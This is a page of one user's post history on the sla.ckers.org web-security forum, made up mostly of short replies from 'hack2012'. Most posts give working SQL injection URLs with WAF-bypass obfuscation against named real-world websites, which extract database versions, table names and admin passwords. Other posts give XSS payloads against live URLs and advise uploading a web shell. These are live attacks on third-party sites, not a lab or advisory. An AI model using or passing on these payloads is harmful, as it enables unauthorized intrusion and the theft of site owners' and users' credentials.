Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 

Pages: 12Next
Current Page: 1 of 2
Results 1 - 30 of 38
4 months ago
hack2012
repeat post ? onerror=alert(1);
Forum: XSS Info
4 months ago
hack2012
maybe you can onclick=alert(1);
Forum: XSS Info
4 months ago
hack2012
sorry , you can't ....
Forum: XSS Info
4 months ago
hack2012
thanks a lot !
Forum: XSS Info
4 months ago
hack2012
where is the url???
Forum: SQL and Code Injection
7 months ago
hack2012
http://www.loytee.com/productDetail.php?ProductId={44439D22-59FB-15FC-692C-DE45EAE180EC}' UNION SELECT 1,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15,16%23
Forum: SQL and Code Injection
7 months ago
hack2012
you can use URLencode to bypass it http://www.livsupplies.co.uk/product_list.php?id=11 UNION SELECT 1,2,%61dmin_firstname,4,5,%61dmin_password,7+from+admin-- for more details, please visit: http://www.waitalone.cn/waf-bypass-the-url-encoding-method.html
Forum: SQL and Code Injection
7 months ago
hack2012
Yes,it is. http://www.wowsoc.org/devzone/?assigned=%3Cscript%3Ealert%28/xss/%29%3C/script%3E
Forum: CSRF and Session Info
7 months ago
hack2012
http://pardumansinghjewellers.com/product_detail.php?id=29 and 0/*!12345UNION*/ SELECT 1,2,@@version,4,5,6 5.5.28-29.1 http://pardumansinghjewellers.com/product_detail.php?id=29 and 0/*!12345UNION*//*!12345SELECT*/ 1,2,table_name,4,5,6 from /*!12345information_schema.tables*/ where table_schema=database() limit 0,1 change 0,1 to 1,1 then you will find the diff
Forum: SQL and Code Injection
7 months ago
hack2012
http://www.dkprintworld.com/product-detail.php?pid=-1280857046 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,2,/*!12345concat*/(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,version(),46,47,48,49,50,51,52,53,54,55,56+from /*!50000information_schema*/.tables where table_schema=database() Just use "concat" function
Forum: SQL and Code Injection
10 months ago
hack2012
where is the url ?
Forum: CSRF and Session Info
11 months ago
hack2012
maybe it's not allowed to execute php in this folder ... upload shell to other folder
Forum: SQL and Code Injection
11 months ago
hack2012
mysql encode ... http://www.cmd5.com/
Forum: SQL and Code Injection
11 months ago
hack2012
if you found, and root user not deny your ip, you can link it with sql client.
Forum: SQL and Code Injection
12 months ago
hack2012
login=nop") union select 1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28;#&pass=nop user = c1bc_cp_dba@localhost it's not root there is no file_priv to load_file or into outfile... so you must to get the username and password from admin table.
Forum: SQL and Code Injection
1 year ago
hack2012
楼主是中国的?
Forum: SQL and Code Injection
1 year ago
hack2012
http://www.aristocars.com.pk/Car.php?id=-250 /*!12346UnioN*/ all select 1,2,@@version
Forum: SQL and Code Injection
1 year ago
hack2012
http://sellbyowners.com.pk/property_view.php?cityid=66&city=Haripur&id=123' or+1+group+by+concat_ws(0x7e,@@version,floor(rand(0)*2))+having+min(0)+or+1%23
Forum: SQL and Code Injection
1 year ago
hack2012
thanks
Forum: Obfuscation
1 year ago
hack2012
Thanks, it's very useful for me !
Forum: Obfuscation
1 year ago
hack2012
Please read it again ... if you want test csrf ,you must konw about the webserver how to add a user or the other operation, then you can make a webform ****** and so on Maybe dvwa can help you !
Forum: CSRF and Session Info
1 year ago
hack2012
Good idear , THanks ... anybody who want's to read more about CSRF: http://seclab.stanford.edu/websec/csrf/ Chinese version: http://www.waitalone.cn/csrf-cross-site-request-forgery-defense.html
Forum: CSRF and Session Info
1 year ago
hack2012
and extractvalue(1, concat(0x7e, (select @@version),0x7e)) and extractvalue(1, concat(0x7e, (select user()),0x7e))
Forum: SQL and Code Injection
1 year ago
hack2012
I am sorry .. https://www.rumo.com.br/sistema/adm/CodigoFonte.asp?path=/&arq=aux
Forum: SQL and Code Injection
1 year ago
hack2012
http://redc.lums.edu.pk/enrollment.php?section_id=10&pcid=53.0' UNION SELECT 1,2,3,4,5,6,7,version(),9,10,11,12--+ 5.5.17 http://redc.lums.edu.pk/enrollment.php?section_id=10&pcid=53.0' and (select 1)=(select 0xA)+UNION SELECT 1,2,3,4,5,6,7,database(),9,10,11,12--+ redc http://redc.lums.edu.pk/enrollment.php?section_id=10&pcid=53.0' and (select 1)=(select 0xA)+UNION SELEC
Forum: SQL and Code Injection
1 year ago
hack2012
on table users
Forum: SQL and Code Injection
1 year ago
hack2012
I want to try , can you sent it to me ???
Forum: SQL and Code Injection
1 year ago
hack2012
may be you can try : -7 /*!%0AUNION*/ /*!%0ASELECT*/ 1,2,user_id,4,5,6,7,8,9+from+user-- or -7 /*!%0AUNION*/ /*!%0ASELECT*/ 1,2,/*!user_id*/,4,5,6,7,8,9+from+user--
Forum: SQL and Code Injection
1 year ago
hack2012
id=-1 /*!%0AUNION*/ /*!%0ASELECT*/ 1,2,/*!%0Agroup_concat*/(/*!%0Atable_name*/),4,5,6,7,8,9 from /*!%0Ainformation_schema*/./*!%0Atables*/ where /*!%0Atable_schema*/=/*!%0Adatabase()*/-- maybe ok , or you can give me the URL.....
Forum: SQL and Code Injection
1 year ago
hack2012
http://www.cobra.com.dz/produits_cat_detail.php?id=-325 /*!%0aUNION*/ /*!%0aSELECT*/ 1,2,3,version(),5--
Forum: SQL and Code Injection
Pages: 12Next
Current Page: 1 of 2